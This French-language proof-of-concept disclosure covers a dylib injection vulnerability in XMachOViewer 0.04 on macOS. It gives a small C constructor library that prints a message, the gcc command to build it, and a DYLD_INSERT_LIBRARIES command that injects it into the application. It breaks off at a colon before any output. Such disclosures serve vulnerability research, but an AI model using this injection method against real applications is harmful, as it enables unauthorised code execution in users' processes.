
Exploit de preuve de concept pour une vulnérabilité d'injection de dylib dans XMachOViewer 0.04, démontrant une exécution de code non autorisée via DYLD_INSERT_LIBRARIES sur macOS.
Une vulnérabilité d'injection de dylib dans XMachOViewer 0.04 permet à des attaquants de compromettre l'intégrité. En exploitant cette faille, du code non autorisé peut être injecté dans les processus du produit, ce qui peut potentiellement conduire à un contrôle à distance et à un accès non autorisé à des données utilisateur sensibles.

Version portable pour macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
Compiler
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
Et injectez-la :
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
Ceci ouvrira l'application et exécutera la dylib. Après avoir fermé l'application, on la voit dans le terminal :
